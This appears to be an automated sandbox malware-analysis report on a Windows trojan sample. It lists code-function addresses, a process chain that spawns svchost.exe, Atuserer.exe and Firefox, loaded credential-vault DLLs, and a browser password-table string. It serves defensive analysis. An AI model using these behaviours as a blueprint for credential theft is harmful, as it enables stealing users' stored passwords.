                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003570FE2_2_003570FE
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003531902_2_00353190
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003412872_2_00341287
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003633072_2_00363307
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036F3592_2_0036F359
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003616042_2_00361604
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003556802_2_00355680
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003678132_2_00367813
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003558C02_2_003558C0
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00361AF82_2_00361AF8
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00379C352_2_00379C35
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003C7E0D2_2_003C7E0D
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0034FE402_2_0034FE40
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036BF262_2_0036BF26
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00361F102_2_00361F10
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_024E36102_2_024E3610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004D88734_2_004D8873
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004C110A4_2_004C110A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C1110
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C2995
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C29A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D01B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D6A4D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D6AC3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C32F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D6ABE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004D03D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C244D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C2450
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004CE453
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C1C2B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C1C30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004EEE13
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C2620
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C2E34
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_004C2E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FC02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F30100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F64750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03000591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FE4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0300A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F4A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F52E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F40E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F4CFE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F32FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FBEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F60F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FE2F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F82F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F30CF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F40C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F58DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FDCD1F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F4AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FE12ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F452A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F8739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F2D34C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF132D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF70E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F470C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0300B16B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F2F172
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F7516C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F85630
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F317EC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F31460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFF43F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030095C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FDD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FEDAC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FDDAAC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F85AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FE1AA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB3A6C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFFA49
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF7A46
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB5BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F7DBF9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F5FB80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFFB76
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F438E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FAD800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F49950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F5B950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FD5910
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F49EB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F03FD2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F03FD5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFFFB1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F41F92
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFFF09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FFFCF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FB9C32
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F5FDC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF7D73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02FF1D5A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02F43D40
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0496E4F6
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04964420
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04972446
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04980591
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C0535
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048DC6E0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048BC7C0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048E4750
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C0770
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04952000
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049801AA
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049741A2
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049781CC
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048B0100
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0495A118
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04948158
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049402C0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04960274
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048CE3F0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049803E6
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497A352
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04960CB5
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048B0CF2
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C0C00
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048D8DBF
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048BADE0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0495CD1F
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048CAD00
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497CE93
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048D2E90
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497EEDB
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497EE26
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C0E59
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0493EFA0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048B2FC8
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048CCFE0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04962F30
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04902F28
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048E0F30
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04934F40
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048A68B8
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048EE8F0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048CA840
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C2840
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C29A0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0498A9A6
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048D6962
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048BEA80
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04976BD7
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497AB40
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497F43F
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048B1460
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0495D5B0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04977571
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049716CC
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497F7B0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048B17EC
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C70C0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0496F0CC
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497F0E0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049770E9
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048CB1B0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048F516C
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0498B16B
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048AF172
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C52A0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048DB2C0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_049612ED
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0490739A
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497132D
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048AD34C
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497FCF2
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04939C32
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048DFDC0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C3D40
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04971D5A
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04977D73
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C9EB0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C1F92
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497FFB1
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497FF09
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C38E0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0492D800
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04955910
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048C9950
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048DB950
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04905AA0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04961AA3
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0495DAAC
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0496DAC6
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04977A46
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497FA49
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04933A6C
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048DFB80
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_04935BF0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_048FDBF9
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0497FB76
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00831CB0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0082CC30
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0082AED0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0082CE50
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_008352F0
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_008334CA
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0083353B
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_00833540
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_0084B890
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_046DE70C
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_046DD7D8
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_046DE255
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_046DE373
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_046DC991
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: 7_2_046DCA88
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: String function: 00360C63 appears 70 times
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: String function: 00368A80 appears 42 times
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: String function: 00347F41 appears 35 times
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: String function: 04907E54 appears 100 times
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: String function: 048F5130 appears 58 times
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: String function: 0492EA12 appears 86 times
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: String function: 0493F290 appears 105 times
                Source: C:\Windows\SysWOW64\Atuserer.exe | Code function: String function: 048AB970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F87E54 appears 109 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F2B970 appears 283 times
                Source: RO2Y11yOJ7.exe, 00000002.00000003.1294518792.00000000041A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RO2Y11yOJ7.exe
                Source: RO2Y11yOJ7.exe, 00000002.00000003.1294669391.000000000434D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs RO2Y11yOJ7.exe
                Source: RO2Y11yOJ7.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@11/9
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AA0F4 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003984F3 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00398AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003BEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_003AC423 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Code function: 2_2_00344FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | File created: C:\Users\user\AppData\Local\Temp\aut92FB.tmp
                Source: RO2Y11yOJ7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Atuserer.exe, 00000007.00000003.1909973708.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1910164552.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RO2Y11yOJ7.exe | ReversingLabs: Detection: 68%
                Source: unknown | Process created: C:\Users\user\Desktop\RO2Y11yOJ7.exe "C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Process created: C:\Windows\SysWOW64\Atuserer.exe "C:\Windows\SysWOW64\Atuserer.exe"
                Source: C:\Windows\SysWOW64\Atuserer.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\Atuserer.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe | Section loaded: rasadhlp.dll
